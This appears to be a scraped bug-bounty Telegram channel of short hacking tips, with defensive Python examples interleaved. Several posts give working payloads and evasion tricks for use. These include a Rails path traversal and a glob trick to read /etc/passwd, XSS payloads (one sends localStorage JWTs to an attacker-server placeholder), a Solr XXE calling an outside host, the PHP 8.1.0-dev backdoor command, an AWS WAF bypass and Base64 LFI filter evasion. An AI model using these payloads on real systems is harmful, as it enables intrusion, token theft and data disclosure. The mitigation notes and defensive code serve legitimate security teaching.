CyberSec Playground | Learn ethical hacking ⚡️
745 subscribers
Welcome to CyberSec Playground! A community to learn, explore, and master penetration testing and bug bounty, ethical hacking, and all things cybersecurity.
Backup : https://t.me/fatherofbits
cybersecplayground.com
#BugBounty #Hacking
If your target uses Rails, look for Action View CVE-2019-5418 - File Content Disclosure vuln. Although this is an old bug, it can still be found.

Intercept the request in Burp and replace the Accept header with:
`Accept: ../../../../../../../../../../etc/passwd{{` 

#bugbountytips
👏5💊1
🚀 HExHTTP: Advanced HTTP Header Testing Tool 🚀

HExHTTP is a Python-based tool designed to analyze HTTP headers for vulnerabilities and identify unusual behaviors in web applications. It's ideal for security researchers and penetration testers.

🌟 Features:

- Perform in-depth tests on HTTP headers.
- Detect potential vulnerabilities and security misconfigurations.
- Support for custom headers, user agents, authentication, and more.

📥 Get Started:

Check out the full details and installation
🔗 https://github.com/c0dejump/HExHTTP

#CyberSecurity #PenTesting #HTTPHeaders #HExHTTP #BugBounty #EthicalHacking #WebSecurity #PythonTools #InfoSec #VulnerabilityTesting
41👍1💊1
⚠️ Alert ⚠️

CVE-2025-21298 : Windows OLE Remote Code Execution Vulnerability

🔥PoC : https://github.com

🧐 Deep Dive : https://redcytadel.com

🔗 Hunter Link:https://hunter.how

🔍 Query

HUNTER :
product.name="Outlook Web App"

FOFA :
product="Microsoft-Outlook"


📰 Refer:https://securityonline.info

#WINDOWS #Outlook #hunterhow #infosec #infosecurity #OSINT #Vulnerability
🗿3👌1💊1
A neat trick for bypassing WAF/filters while testing for OS command injection vulnerabilities.

Use shell globbing / wildcard expansion. Here is an example:

cat /e*c/p*s*d is equivalent to cat /etc/passwd. But how?

Before cat runs, the shell expands the glob pattern /e*c/p*s*d to match actual files and directories in the filesystem.

/e*c: The shell interprets this as "any path starting with /e, followed by zero or more characters (*), ending with c."

/p*s*d: This matches a path or file name starting with p, followed by zero or more characters (*), then s, then zero or more characters (*), then d

#bugbountytips #hacking
41💊1
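The detection side of the glob trick above, as an added example (not code from the channel): it expands a wildcard path the way a POSIX shell does, segment by segment so that `*` never crosses `/`, and checks whether the pattern resolves to a sensitive file. The sensitive-path list, the token regex and the sample parameter values are constructed for illustration.

```python
"""Detection-side view of shell wildcard expansion in a request parameter.
Added example: SENSITIVE_PATHS and the sample inputs are constructed."""
import re
from fnmatch import fnmatchcase

# Constructed reference list: files an OS-command-injection probe typically reads.
SENSITIVE_PATHS = [
    "/etc/passwd",
    "/etc/shadow",
    "/etc/hosts",
    "/proc/self/environ",
]

GLOB_CHARS = re.compile(r"[*?\[]")
# Absolute-path-looking tokens; stops at whitespace, shell separators and quotes.
PATH_TOKEN = re.compile(r"""/[^\s;|&`'"]+""")


def shell_glob_match(pattern: str, path: str) -> bool:
    """Mimic shell pathname expansion: every '/'-separated segment of the
    pattern must match the corresponding segment of the path. Unlike
    fnmatch on the whole string, '*' here does not match across '/'."""
    p_segs = pattern.split("/")
    f_segs = path.split("/")
    if len(p_segs) != len(f_segs):
        return False
    return all(fnmatchcase(f, p) for p, f in zip(p_segs, f_segs))


def expand_against(pattern: str, candidates=SENSITIVE_PATHS):
    """Return the sensitive paths a wildcard pattern would expand to."""
    return [c for c in candidates if shell_glob_match(pattern, c)]


def flag_obfuscated_path(value: str):
    """Inspect one parameter value: find absolute-path tokens that contain
    glob metacharacters and expand to a sensitive file.
    Returns a list of (token, matched_paths). A literal '/etc/passwd'
    carries no glob characters and is left to the plain string rule."""
    findings = []
    for token in PATH_TOKEN.findall(value):
        if GLOB_CHARS.search(token):
            hits = expand_against(token)
            if hits:
                findings.append((token, hits))
    return findings


if __name__ == "__main__":
    # Constructed sample: the pattern from the post inside a typical injection probe.
    print(flag_obfuscated_path("ip=1.1.1.1;cat /e*c/p*s*d"))
```

Matching per path segment matters: a naive `fnmatch` over the whole string would also let `/e*` match `/etc/passwd`, which the shell never does, and the rule would over-report.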
This payload can be used for Client Side Template injection and Reflected XSS, perhaps a code injection can be triggered in the background

🚀 Payload :
'%3e%3cscript%3ealert(5*5)%3c%2fscript%3eejj4sbx5w4o

#bugbountytips #BugBounty #payload #cybersecurity
🔥4💊3
🔍 Bystander: Passive Web Vulnerability Detection Tool 🔍

Overview: Bystander is a Chrome extension that passively monitors network requests to identify potential web vulnerabilities directly within your browser. As you browse, Bystander alerts you to any detected security issues, enhancing your web security awareness.

Key Features:
- Vulnerability Detection: Identifies actual web vulnerabilities such as Cross-Site Request Forgery (CSRF) and Clickjacking.

- Code Sink Alerts: Detects potential code injection points, including NoSQL Injection (NoSQLi), Server-Side Template Injection (SSTI), and Server-Side Includes (SSI).

- API Token Leakage: Alerts you if API tokens are exposed during your browsing sessions.

- Personal Identifiable Information (PII) Monitoring: Notifies you of potential leaks of sensitive information like PAN numbers or hash disclosures.

- Insight Gathering: Observes and reports on staging domains, admin dashboards, and other critical elements in frontend code and network traffic.


Installation Steps:
- Download: Clone or download the Bystander repository from GitHub.

- Load Extension: In your Chromium-based browser (e.g., Chrome), navigate to Settings > Extensions and enable Developer Mode.

- Add Bystander: Click on "Load unpacked" and select the Bystander folder you downloaded.


For more detailed information and to access the source code, visit the Bystander GitHub repository:
https://github.com/itsdivyanshjain/Bystander
🔥4💊3
See an Apache Solr GET/POST to /select?

Set the 'q' parameter to the following for an XXE injection:

/select?q={!xmlparser v='<!DOCTYPE a SYSTEM "http://collab.burp.net"><a></a>'}


#infosec #cybersec #bugbountytips
💊7❤‍🔥1
If you find PHP 8.1.0-dev then try RCE & SQLi
User-Agentt: zerodiumsleep(5);
User-Agentt: zerodiumsystem('id');

#bugbounty #bugbountytips #rce #sqli #cybersecurity
💊6
CVE-2024-9047: WordPress File Upload plugin for WordPress is vulnerable to a Path Traversal vulnerability in all versions up to, and including, 4.24.11 via the wfu_file_downloader.php...
exploitfinder.com/dbexploit/expl…
🔥4💊3
⛏️ Find Leaked Credentials Using Google Chrome dev Tools (The Best Way)

🔗 https://github.com/h4x0r-dz/Leaked-Credentials/

#bugbountytips #bugbounty #infosec #hacker #hacking
💊3👌2
🚨CVE-2024-55591: Fortinet FortiOS Authentication Bypass Proof of Concept

🔗: https://github.com/watchtowrlabs...
👍4💊3
🚨 Critical Vulnerability Alert: Fortinet FortiOS Authentication Bypass (CVE-2024-55591) 🚨

**Overview:**
A significant security flaw has been identified in Fortinet's FortiOS and FortiProxy systems, allowing remote attackers to gain super-admin privileges without proper authentication. This vulnerability is actively being exploited in the wild. ([FortiGuard](https://www.fortiguard.com/psirt/FG-IR-24-535))


**Technical Details:**
- **Vulnerability ID:** CVE-2024-55591
- **Affected Products:**
  - FortiOS versions 7.0.0 through 7.0.16
  - FortiProxy versions 7.0.0 through 7.0.19 and 7.2.0 through 7.2.12


**Impact:**
Allows attackers to gain super-admin privileges via crafted requests to the Node.js websocket module. ([NVD](https://nvd.nist.gov/vuln/detail/cve-2024-55591))


**Proof of Concept:**
A proof-of-concept (PoC) exploit has been released by watchTowr Labs, demonstrating how this vulnerability can be leveraged to execute commands with super-admin privileges. The PoC is available on GitHub: ([GitHub](https://github.com/watchtowrlabs/fortios-auth-bypass-poc-CVE-2024-55591))


**Mitigation:**
Fortinet has acknowledged the issue and is expected to release patches. Administrators are advised to monitor official Fortinet communications for updates and apply patches promptly. In the meantime, consider restricting access to management interfaces and implementing network segmentation to mitigate potential exploitation.
💊5🗿2👍1
quick Linux tip 💡

In Linux, you can use the pgrep command to find the PID of a certain process based on its name, pattern, or other criteria.

$ pgrep name

You can also use pidof, but it only works with exact binary names and doesn't support pattern matching.


follow us for more great tips! 🐧😎

#cybersecurity #BugBounty #bugbountytips #linuxtips
💊5👌2
🌟 bugbountytip

🌟 403 Successful bypass

🌟 add ../ between two UUIDs and bypass 403


#BugBounty #bugbountytips #BugHunter #bug #web2 #web3 #ethicalhacking
💊4🗿2🔥1
🚨 XSS Payload : Stealing JWT from Local Storage 🚨

A malicious XSS payload can be used to extract JSON Web Tokens (JWTs) stored in localStorage and send them to an attacker-controlled server. Here's a simple yet dangerous example:



<img src='https://<attacker-server>/yikes?jwt='+JSON.stringify(localStorage);'--!>


🛠 How It Works:
This payload injects an <img> tag into a vulnerable webpage.
The src attribute is set to an attacker's server, appending the contents of localStorage (which may contain JWTs or sensitive data).
When executed, the victim's browser sends their JWTs to the attacker's server.


🔥 Why Is This Dangerous?
Attackers can hijack sessions and gain unauthorized access.
Sensitive tokens (JWT, API keys) can be stolen and misused.
If exploited on an admin panel, attackers might escalate privileges.


🛡 How to Prevent It?
✔️ Use HTTP-Only Cookies: Store authentication tokens in cookies with the HttpOnly and Secure flags to prevent JavaScript access.

✔️ Implement CSP (Content Security Policy): Restrict inline scripts and unauthorized domains.

✔️ Sanitize User Input: Use libraries like DOMPurify to prevent injecting malicious HTML.

✔️ Validate & Escape Data Properly: Ensure user inputs are validated before rendering.


🚀 Stay Secure 🔐

#CyberSecurity #XSS #WebSecurity #EthicalHacking #BugBounty #JWT #PenTesting #InfoSec
🎃3💊2❤‍🔥1👍1
🧨 Reflected XSS (RXSS) Payload Alert! 🧨

Reflected XSS (RXSS) vulnerabilities allow attackers to inject and execute malicious scripts by crafting special payloads. Here's a custom payload that triggers a prompt pop-up when injected into a vulnerable web application.

💣 Custom Payload:
"></a></td></tr></table><script>prompt('ijustcopypastelikeanoob');</script></html>//


🔥 How It Works:
- Breaks out of HTML structure using "></a></td></tr></table>.

- Injects a <script> tag that executes JavaScript.

- Triggers a prompt function, confirming code execution.


⚠️ Potential Dangers:
Can be modified to steal cookies, localStorage, or session tokens.
Attackers can perform actions on behalf of users (CSRF-like behavior).
Could be used to deface websites, spread malware, or execute phishing attacks.


🛡 How to Prevent RXSS?
✔️ Sanitize & Escape User Input: Remove or encode characters like <, >, ", '.

✔️ Use CSP (Content Security Policy): Restrict inline scripts and only allow trusted domains.

✔️ Validate Input on Server & Client Side: Never trust user-generated data.

✔️ Use Security Libraries: Implement DOMPurify or similar libraries to filter untrusted input.


🚀 Stay Safe ! 🔐

#CyberSecurity #RXSS #XSS #WebSecurity #BugBounty #EthicalHacking #InfoSec #PenTesting
🔥4
🚀 Exploring Privilege Escalation via sudo iptables 🚀

In a recent blog post by Shielder, security researchers delve into two innovative techniques that allow a low-privileged user to escalate their privileges to root by leveraging sudo permissions on iptables and iptables-save.


Key Takeaways

Injecting Fake /etc/passwd Entries:
By executing iptables and iptables-save with sudo, an attacker can inject a malicious entry into the /etc/passwd file. This is achieved by adding a crafted comment in an iptables rule and then using iptables-save to overwrite the legitimate /etc/passwd file, effectively creating a new user with root privileges.


Exploiting Missing Kernel Modules:
If the system lacks certain kernel modules required by iptables, an attacker can utilize the --modprobe argument to execute arbitrary commands. This method relies on the attacker's ability to run iptables with sudo and the absence of specific kernel modules on the target system.
These findings underscore the importance of carefully managing sudo permissions and ensuring that only trusted users have access to powerful system utilities like iptables. Administrators are advised to review their sudoers configurations and restrict access to such commands to mitigate potential security risks.


For a detailed walkthrough of these techniques, check out the full article: A Journey From sudo iptables To Local Privilege Escalation

🔗 https://www.shielder.com

#CyberSecurity #PrivilegeEscalation #LinuxSecurity #EthicalHacking #InfoSec #PenTesting
👌3💊2🎃1
🛡 Exclusive AWS WAF Bypass – Works on All Tags (Even <meta>)! 🔥

💡 Bypassing AWS Web Application Firewall (WAF)
using a unique payload that executes JavaScript onmouseover, even in restricted tags like <meta> (but not <input type="hidden">).

🔹 Payload:
<xhzeem attr="--- x="=='='onmouseover=confirm`xhzeem` style="display:block;width:1000px;height:1000px;background:red"> --- ">


⚡️ How It Works:
Uses a *custom HTML tag (`<xhzeem>`) to bypass WAF detection.*
Encapsulates the payload in an *unusual attribute structure.*
The *`onmouseover=confirm('xhzeem')`* triggers when hovered over.
Works on *various HTML tags* (even `<meta>`, `<div>`, `<span>`), making it a powerful *XSS attack vector.*


🚨 Why Is This Dangerous?
🔻 Can be used for *session hijacking, cookie theft, or phishing.*
🔻 AWS WAF may fail to detect this due to *non-standard attribute structures.*
🔻 Possible *bypass for CSP/XSS filters* in misconfigured apps.


🛡 Mitigation Steps:
✔️ Use a strict Content Security Policy (CSP).
✔️ Implement proper input sanitization.
✔️ Don't rely solely on AWS WAF for XSS protection!
✔️ Perform security testing using advanced payloads like this!


🚀 Stay Secure & Test Your WAF Rules!

#CyberSecurity #AWS #WAFBypass #XSS #WebSecurity #BugBounty #EthicalHacking #PenTesting #InfoSec
💊5🔥2
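The three XSS posts above (the localStorage `<img>` payload, the `"></a></td>...<script>` breakout, and the `<xhzeem ... onmouseover=...>` tag) all rely on untrusted text reaching the page with `<`, `>`, `"` or `'` intact. This added example, not code from the channel, shows the output-encoding mitigation those posts recommend: the reflected value is entity-encoded for the HTML text and quoted-attribute contexts, and a check confirms none of the breakout characters survive. The template and the embedded copies of the payloads are constructed test input; `attacker.example` stands in for the `<attacker-server>` placeholder.

```python
"""Contextual output encoding for reflected input. Added example; the
template, the check and the embedded payload copies are constructed."""
import html
import re

# Copies of the payloads from the posts above, embedded as constructed test input.
PAYLOADS = {
    "jwt_img": "<img src='https://attacker.example/yikes?jwt='+JSON.stringify(localStorage);'--!>",
    "rxss": "\"></a></td></tr></table><script>prompt('x');</script></html>//",
    "xhzeem": "<xhzeem attr=\"--- x=\"=='='onmouseover=confirm`xhzeem` style=\"display:block\"> --- \">",
}

# Any of these surviving into the markup means the value can open a tag
# or terminate a quoted attribute.
TAG_OR_ATTR_BREAK = re.compile(r"[<>\"']")


def escape_for_html(untrusted: str) -> str:
    """Entity-encode & < > and both quote characters, so the same value is
    safe both as a text node and inside a double- or single-quoted attribute."""
    return html.escape(untrusted, quote=True)


def render_search_page(query: str) -> str:
    """Constructed template: the reflected value lands in a text node and
    in a quoted attribute, both using the escaped form."""
    safe = escape_for_html(query)
    return (
        "<p>Results for: {0}</p>\n"
        '<input type="text" name="q" value="{0}">'
    ).format(safe)


def is_inert(rendered: str, untrusted: str) -> bool:
    """True when the untrusted value appears in the markup only in its escaped
    form and that form contains none of < > \" '."""
    safe = escape_for_html(untrusted)
    return safe in rendered and TAG_OR_ATTR_BREAK.search(safe) is None


if __name__ == "__main__":
    for name, payload in PAYLOADS.items():
        print(name, "inert:", is_inert(render_search_page(payload), payload))
```

Encoding is context-specific: this covers HTML body and quoted attributes only. A value placed inside a `<script>` block, a URL, or an unquoted attribute needs its own encoder, which is why the posts also recommend a CSP and HttpOnly cookies as defence in depth.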
🔥 Bypassing Security Filters Using Base64 Encoding 🔥

💡 Why didn't we use plain /etc/passwd?
When trying to access sensitive files directly via Local File Inclusion (LFI), the server often detects known patterns (e.g., /etc/passwd) and blocks them with a 403 Forbidden response. However, many filters don’t decode Base64-encoded payloads, allowing us to bypass restrictions.

🚀 Example: Bypassing LFI Restrictions

Blocked Attempt:
url/?f=/etc/passwd  ==> 403 (Forbidden)


🔻 The server has a security mechanism in place to detect and block direct access to sensitive files.

Bypassing with Base64 Encoding:

First, encode /etc/passwd into Base64:

echo -n "/etc/passwd" | base64

🔹 Output: L2V0Yy9wYXNzd2Q=

Then, send the request with the encoded payload:

url/?f=L2V0Yy9wYXNzd2Q=  ==> 200 (Success)


🔹 If the server automatically decodes Base64 before processing the request, it may serve the /etc/passwd file without triggering security filters.

📌 Where Can This Trick Be Used?

🔹 SQL Injection (SQLi):

Some WAFs block ' or -- in queries. By encoding or double-encoding the payload, you can bypass detection.

🔹 Server-Side Template Injection (SSTI):

Certain template engines automatically decode Base64, allowing exploitation through encoded payloads.

🔹 Cross-Site Scripting (XSS):

Some WAFs block <script>. By encoding it, you may bypass the filter and execute the script.

<img src="data:image/svg+xml;base64,PHNjcmlwdD5hbGVydCgneHhzJyk8L3NjcmlwdD4=">

(Decodes to <script>alert('xxs')</script> inside an SVG file)

🔹 Local File Inclusion (LFI):

As shown above, encoding file paths can trick the server into allowing access.

🔹 Remote File Inclusion (RFI):

Some servers allow including external files when encoded in Base64.

🛡 Mitigation Techniques
🔹 Disable automatic Base64 decoding in web applications.
🔹 Use allowlists instead of blocklists for filtering inputs.
🔹 Enforce strict input validation to reject encoded malicious payloads.
🔹 Monitor logs for unusual Base64 patterns that could indicate an attack.

🔥 Takeaway for Bug Bounty Hunters & Pentesters
Encoding payloads in Base64, double Base64, or URL encoding can help bypass WAFs and security filters.
Always check if the server decodes Base64 before processing input—this can be a goldmine for exploitation.
Combine encoding with other techniques (e.g., double encoding, path traversal, null-byte injection) for better results!

🚀 Stay Curious, Keep Hacking!

#BugBounty #Pentesting #CyberSecurity #EthicalHacking #LFI #XSS #SQLi #SSTI #InfoSec #WAFBypass
🔥6💊3❤‍🔥1
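The LFI part of the post above turns on one thing: the server validates the parameter before it decodes it. This added example, not code from the channel, shows the order the mitigation section calls for: reproduce every decoding layer the application applies (repeated URL-decoding, then an optional Base64 layer), and only then apply the null-byte, absolute-path and base-directory checks. The base directory, the decoding behaviour of the application and the sample requests are constructed; a real service would decode exactly what its own framework decodes.

```python
"""Decode-then-validate for a file parameter. Added example: BASE_DIR, the
hypothetical application's decoding rules and the sample inputs are constructed."""
import base64
import binascii
import posixpath
from urllib.parse import unquote

BASE_DIR = "/srv/app/public"   # constructed: the only directory that may be served
MAX_DECODE_ROUNDS = 3          # bound for nested (double/triple) URL encoding


def app_decode(value: str) -> str:
    """Reproduce the decoding the hypothetical application performs:
    URL-decode until the value stops changing, then strip one Base64 layer
    if the value is valid Base64 that decodes to UTF-8 text."""
    for _ in range(MAX_DECODE_ROUNDS):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    try:
        value = base64.b64decode(value, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        pass  # not Base64: keep the literal value
    return value


def resolve_safe(param: str):
    """Return the canonical path to serve, or None to reject. Every check
    runs on the fully decoded value, so encoding layers cannot hide it."""
    candidate = app_decode(param)
    if not candidate or "\x00" in candidate:
        return None                                  # empty or null-byte truncation
    if posixpath.isabs(candidate):
        return None                                  # absolute paths never allowed
    full = posixpath.normpath(posixpath.join(BASE_DIR, candidate))
    # normpath collapses '..'; containment in BASE_DIR is the decisive check.
    if posixpath.commonpath([BASE_DIR, full]) != BASE_DIR:
        return None
    # In production also realpath() the result so symlinks cannot escape BASE_DIR.
    return full


if __name__ == "__main__":
    # Constructed samples: the Base64 value from the post, a double-encoded
    # traversal, a null byte, and a legitimate relative file.
    for p in ("L2V0Yy9wYXNzd2Q=", "%252e%252e%252fetc%252fpasswd",
              "report%00.txt", "docs/report.txt"):
        print(repr(p), "->", resolve_safe(p))
```

The allowlist is the directory itself rather than a blocklist of strings such as `/etc/passwd`, so there is no pattern for an encoder to dodge; whatever the parameter decodes to either lands under `BASE_DIR` or is refused.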
🚀 OAuth Logout URL XSS Exploit (CVE-2023-24488) - POC 🚀

💡 Vulnerability: Cross-Site Scripting (XSS) via post_logout_redirect_uri in OAuth endpoint.

💀 Impact: Allows stealing cookies, session hijacking, or phishing attacks on OAuth-based apps.

🔥 POC Payload:

oauth/idp/logout?post_logout_redirect_uri=%0d%0a%0d%0a%3Cscript%3Ealert(document.cookie)%3C/script%3E


✔️ What Happens?
The application fails to properly sanitize the post_logout_redirect_uri parameter, allowing injection of line breaks (%0d%0a) and JavaScript execution (<script>alert(document.cookie)</script>).


✔️ Why Is This Dangerous?
Can steal session cookies (if HttpOnly is not enabled).
Phishing attacks by injecting fake login pages.
Account takeover risk if chained with other OAuth flaws.


🛡 How to Prevent It?
✔️ Sanitize and validate redirect URLs (allow only whitelisted domains).
✔️ Encode user input properly to prevent JavaScript execution.
✔️ Enable Content Security Policy (CSP) to block inline scripts.
✔️ Use HttpOnly & Secure cookies to protect sensitive session data.


🕵️‍♂️ Bug Bounty Tip:
🔹 Always check OAuth redirect parameters for XSS & open redirect issues!
🔹 Test post_logout_redirect_uri, redirect_uri, and similar params.
🔹 Try encoding tricks like double URL encoding, newline injection, and HTML entity encoding.


🔗 Stay ahead in bug bounty hunting & penetration testing! 🚀
🚀 Join us for daily tips and more bbh learning 🚀

#InfoSec #CyberSec #BugBountyTips #XSS #OAuth #WebSecurity #EthicalHacking #AppSec #PenTesting
🔥5💊3
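The mitigation the post above asks for, validating `post_logout_redirect_uri` against an allowlist, as an added example that is not code from the advisory, the vendor or the channel. The allowed hosts and sample values are constructed. One detail worth the separate check: `urllib.parse.urlsplit()` silently strips CR and LF, so the control-character test runs on the raw decoded string before any URL parsing, otherwise the `%0d%0a` payload would be parsed as if the line breaks were never there.

```python
"""Allowlist validation for an OAuth post_logout_redirect_uri. Added example:
ALLOWED_REDIRECT_HOSTS and the sample values are constructed."""
from urllib.parse import unquote, urlsplit

ALLOWED_REDIRECT_HOSTS = {"app.example.com", "login.example.com"}  # constructed


def decode_param(raw_query_value: str) -> str:
    """One URL-decoding pass, as a web framework applies before the app sees the value."""
    return unquote(raw_query_value)


def validate_post_logout_redirect(uri: str) -> bool:
    """Accept only absolute https URLs whose host is on the allowlist.
    `uri` is the already URL-decoded parameter value."""
    # CR/LF or other control bytes: header or HTML injection, refuse before parsing.
    if not uri or any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in uri):
        return False
    parts = urlsplit(uri)
    if parts.scheme != "https":
        return False        # also rejects javascript:, data: and scheme-relative //host
    if parts.username or parts.password:
        return False        # https://app.example.com@evil.example style confusion
    return parts.hostname in ALLOWED_REDIRECT_HOSTS


if __name__ == "__main__":
    # Constructed samples: the encoded payload from the post and a legitimate value.
    for raw in ("%0d%0a%0d%0a%3Cscript%3Ealert(document.cookie)%3C/script%3E",
                "https://app.example.com/logged-out"):
        print(repr(raw), "->", validate_post_logout_redirect(decode_param(raw)))
```

Exact host matching is deliberate: a prefix or substring rule (`startswith("https://app.example.com")`) would admit `https://app.example.com.evil.example/`, which is the open-redirect case the post's bug bounty tip points at.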